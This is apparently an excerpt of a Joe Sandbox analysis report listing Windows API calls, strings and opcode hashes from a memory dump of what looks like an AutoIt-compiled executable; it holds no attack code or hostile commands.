                                                                                                                        • Opcode ID: a3c35c493b89577fd1c45ced31359f2fe74b64d0f437e0ae40c41615acb891c7
                                                                                                                        • Instruction ID: cac43393dd378e83ab0b84eb8845b2662ae2ab1e3ebd361abc3affb8fd72a1f9
                                                                                                                        • Opcode Fuzzy Hash: a3c35c493b89577fd1c45ced31359f2fe74b64d0f437e0ae40c41615acb891c7
                                                                                                                        • Instruction Fuzzy Hash: 2EA1BE702142059BCB08EF24C852B7AB7A1FF85354F198969F996AB7D2DB30EC05CB71
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00DCE6E1
                                                                                                                        • _wcscmp.LIBCMT ref: 00DCE6F2
                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00DCE71A
                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00DCE737
                                                                                                                        • _wcscmp.LIBCMT ref: 00DCE755
                                                                                                                        • _wcsstr.LIBCMT ref: 00DCE766
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00DCE79E
                                                                                                                        • _wcscmp.LIBCMT ref: 00DCE7AE
                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00DCE7D5
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00DCE81E
                                                                                                                        • _wcscmp.LIBCMT ref: 00DCE82E
                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00DCE856
                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00DCE8BF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                        • Opcode ID: 233f6a1b59dc61436bead55506b58f35346f3f82bc28dbfcf21016f266a991bc
                                                                                                                        • Instruction ID: 57394556f2a96cfb41cacaeae3f8f0ec73c57280d40d7d214c98d117c3fb0c33
                                                                                                                        • Opcode Fuzzy Hash: 233f6a1b59dc61436bead55506b58f35346f3f82bc28dbfcf21016f266a991bc
                                                                                                                        • Instruction Fuzzy Hash: B9818DB10082069BDB15DF11C885FAA7BE8EF84714F18856EFD8A9B096DB30DD45CBB1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                        • Opcode ID: d8376f25c804196a90473cadfba47a39d8626f71c2e8985b3b9ab0865a6b7255
                                                                                                                        • Instruction ID: e9e073c636af6c27eb3352fd7a52d601a405ccee6fb31b76829c9e2415803d79
                                                                                                                        • Opcode Fuzzy Hash: d8376f25c804196a90473cadfba47a39d8626f71c2e8985b3b9ab0865a6b7255
                                                                                                                        • Instruction Fuzzy Hash: B4316B71A54306E6DB15EB60ED93FAEB3A49F21704BA0052DF642720D6FF61AF048A71
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00DCF8AB
                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DCF8BD
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00DCF8D4
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00DCF8E9
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00DCF8EF
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00DCF8FF
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00DCF905
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DCF926
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DCF940
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00DCF949
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00DCF9B4
                                                                                                                        • GetDesktopWindow.USER32 ref: 00DCF9BA
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00DCF9C1
                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00DCFA0D
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00DCFA1A
                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00DCFA3F
                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DCFA6A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3869813825-0
                                                                                                                        • Opcode ID: fb85b3e2318043a9b4072d55ec04b6bdc0537ae3b65a2e894387f7203e456983
                                                                                                                        • Instruction ID: 58cfd2eff971470d4da8af54df55f275e11c29577706437ed87ab76f8122f711
                                                                                                                        • Opcode Fuzzy Hash: fb85b3e2318043a9b4072d55ec04b6bdc0537ae3b65a2e894387f7203e456983
                                                                                                                        • Instruction Fuzzy Hash: 4C513D7090070AAFDB209FA9CD85FAEBBB6FF04704F00492DE596A35A0C774A944CF10
                                                                                                                        APIs
                                                                                                                        • _wcscpy.LIBCMT ref: 00DE026A
                                                                                                                        • _wcschr.LIBCMT ref: 00DE0278
                                                                                                                        • _wcscpy.LIBCMT ref: 00DE028F
                                                                                                                        • _wcscat.LIBCMT ref: 00DE029E
                                                                                                                        • _wcscat.LIBCMT ref: 00DE02BC
                                                                                                                        • _wcscpy.LIBCMT ref: 00DE02DD
                                                                                                                        • __wsplitpath.LIBCMT ref: 00DE03BA
                                                                                                                        • _wcscpy.LIBCMT ref: 00DE03DF
                                                                                                                        • _wcscpy.LIBCMT ref: 00DE03F1
                                                                                                                        • _wcscpy.LIBCMT ref: 00DE0406
                                                                                                                        • _wcscat.LIBCMT ref: 00DE041B
                                                                                                                        • _wcscat.LIBCMT ref: 00DE042D
                                                                                                                        • _wcscat.LIBCMT ref: 00DE0442
                                                                                                                          • Part of subcall function 00DDC890: _wcscmp.LIBCMT ref: 00DDC92A
                                                                                                                          • Part of subcall function 00DDC890: __wsplitpath.LIBCMT ref: 00DDC96F
                                                                                                                          • Part of subcall function 00DDC890: _wcscpy.LIBCMT ref: 00DDC982
                                                                                                                          • Part of subcall function 00DDC890: _wcscat.LIBCMT ref: 00DDC995
                                                                                                                          • Part of subcall function 00DDC890: __wsplitpath.LIBCMT ref: 00DDC9BA
                                                                                                                          • Part of subcall function 00DDC890: _wcscat.LIBCMT ref: 00DDC9D0
                                                                                                                          • Part of subcall function 00DDC890: _wcscat.LIBCMT ref: 00DDC9E3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                        • API String ID: 2955681530-2806939583
                                                                                                                        • Opcode ID: 87d17a317896fbe4c23e89cf00272e56a955235ec49045b7944883fe3fcc4364
                                                                                                                        • Instruction ID: 26c272fb10d36112cf5c88440957b0fccdcb88596c1b488925f92aa90b645634
                                                                                                                        • Opcode Fuzzy Hash: 87d17a317896fbe4c23e89cf00272e56a955235ec49045b7944883fe3fcc4364
                                                                                                                        • Instruction Fuzzy Hash: 8D91A071504341AFCF20EB60C955F9BB7E9EF88310F044859F5599B291EB74EA84CBB2
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DFCD0B
                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 00DFCD83
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DFCE04
                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DFCE26
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DFCE35
                                                                                                                        • DestroyWindow.USER32(?), ref: 00DFCE52
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D90000,00000000), ref: 00DFCE85
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DFCEA4
                                                                                                                        • GetDesktopWindow.USER32 ref: 00DFCEB9
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00DFCEC0
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DFCED2
                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DFCEEA
                                                                                                                          • Part of subcall function 00DAB155: GetWindowLongW.USER32(?,000000EB), ref: 00DAB166
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                        • API String ID: 1297703922-3619404913
                                                                                                                        • Opcode ID: 082b4a3a968408ad219091d752af0c11d7009809f97a089e3ce9393ee41f0582
                                                                                                                        • Instruction ID: d3e7dde07cd9b8947d755bf7aeaea74aa8dd34680f8640a4f34177d82a056bce
                                                                                                                        • Opcode Fuzzy Hash: 082b4a3a968408ad219091d752af0c11d7009809f97a089e3ce9393ee41f0582
                                                                                                                        • Instruction Fuzzy Hash: 3571BB7115434DAFDB25CF28CC45FBA3BE5EB89704F488918FA85A72A1D770E815CB21
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00DDB46D
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00DDB476
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00DDB482
                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DDB561
                                                                                                                        • __swprintf.LIBCMT ref: 00DDB591
                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00DDB5BD
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00DDB63F
                                                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00DDB6D1
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00DDB727
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00DDB736
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00DDB772
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                        • API String ID: 3730832054-3931177956
                                                                                                                        • Opcode ID: d19c8628644a2f194dd89a0c3c65258671017ad3430f440fec63a603cba616ab
                                                                                                                        • Instruction ID: d380156ea27fe6908af6c1cd0e8066f6b499c1452f048a9c0bc83d4d606ace9d
                                                                                                                        • Opcode Fuzzy Hash: d19c8628644a2f194dd89a0c3c65258671017ad3430f440fec63a603cba616ab
                                                                                                                        • Instruction Fuzzy Hash: 91C1DE31A04615EBCF10DF65D894B6AB7B4FF05328F1A846BE455AB382DB30E844DBB0
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00DF6FF9
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DF7044
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                        • API String ID: 3974292440-4258414348
                                                                                                                        • Opcode ID: 509859a5140d22c80168672561fba9f5e5fd1966a94bd7bfa8720123ecffd984
                                                                                                                        • Instruction ID: 869249bdc58e06f39d86da32507324f8c74a86ed8036bc6840d52498401a84db
                                                                                                                        • Opcode Fuzzy Hash: 509859a5140d22c80168672561fba9f5e5fd1966a94bd7bfa8720123ecffd984
                                                                                                                        • Instruction Fuzzy Hash: CB9196742087059FCB04EF24C851BA9B7A2EF95350F05886DF9956B392DB31ED0ACBB1
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DFE3BB
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DFBCBF), ref: 00DFE417
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DFE457
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DFE49C
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DFE4D3
                                                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00DFBCBF), ref: 00DFE4DF
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DFE4EF
                                                                                                                        • DestroyCursor.USER32(?), ref: 00DFE4FE
                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DFE51B
                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DFE527
                                                                                                                          • Part of subcall function 00DB1BC7: __wcsicmp_l.LIBCMT ref: 00DB1C50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                        • API String ID: 3907162815-1154884017
                                                                                                                        • Opcode ID: 7d313ea13d89be527c9a47ee5ce91ab99897f228846e535f25b59121be4f6467
                                                                                                                        • Instruction ID: ba50b21e3971164cbb42b0eb3a78f19e7b6d917d8216edbb5d935bbd660ed4a0
                                                                                                                        • Opcode Fuzzy Hash: 7d313ea13d89be527c9a47ee5ce91ab99897f228846e535f25b59121be4f6467
                                                                                                                        • Instruction Fuzzy Hash: 5F618C71500219BEEB14DF64CC46BFA7BA8FB08721F108219FA15E61E1DB74D984D7B0
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00DE0EFF
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DE0F0F
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DE0F1B
                                                                                                                        • __wsplitpath.LIBCMT ref: 00DE0F79
                                                                                                                        • _wcscat.LIBCMT ref: 00DE0F91
                                                                                                                        • _wcscat.LIBCMT ref: 00DE0FA3
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00DE0FB8
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE0FCC
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE0FFE
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE101F
                                                                                                                        • _wcscpy.LIBCMT ref: 00DE102B
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DE106A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 3566783562-438819550
                                                                                                                        • Opcode ID: e68c55de0c81b5a2182bd02db79344b9aaac27f70300e1299711458186b326a9
                                                                                                                        • Instruction ID: 3ff57d040e49d0aab25a4e8df4b36667f73cd21999f63e7b4c2510de59f2ff9e
                                                                                                                        • Opcode Fuzzy Hash: e68c55de0c81b5a2182bd02db79344b9aaac27f70300e1299711458186b326a9
                                                                                                                        • Instruction Fuzzy Hash: A1619FB65083459FCB10EF25C84099EB7E8FF89310F04891EF99997251EB31EA45CBB2
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00DDDB26
                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 00DDDB73
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDDBBB
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDDBF2
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDDC20
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                        • API String ID: 2698844021-4113822522
                                                                                                                        • Opcode ID: fa422fbf639eb6f88dba56829c36bfd388615e05d93e8122c8b5311f3c43c1e9
                                                                                                                        • Instruction ID: f0b905b774a0f37b64bb70adae4ca76d461c35438ac181fdeecae1fa0651bd0c
                                                                                                                        • Opcode Fuzzy Hash: fa422fbf639eb6f88dba56829c36bfd388615e05d93e8122c8b5311f3c43c1e9
                                                                                                                        • Instruction Fuzzy Hash: 06518E711083059FCB00EF24D88196AB7F9FF88758F14896DF895A7261DB31EE05CB61
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E04085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00DD3145
                                                                                                                        • LoadStringW.USER32(00000000,?,00E04085,00000016), ref: 00DD314E
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00E04085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00DD3170
                                                                                                                        • LoadStringW.USER32(00000000,?,00E04085,00000016), ref: 00DD3173
                                                                                                                        • __swprintf.LIBCMT ref: 00DD31B3
                                                                                                                        • __swprintf.LIBCMT ref: 00DD31C5
                                                                                                                        • _wprintf.LIBCMT ref: 00DD326C
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DD3283
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
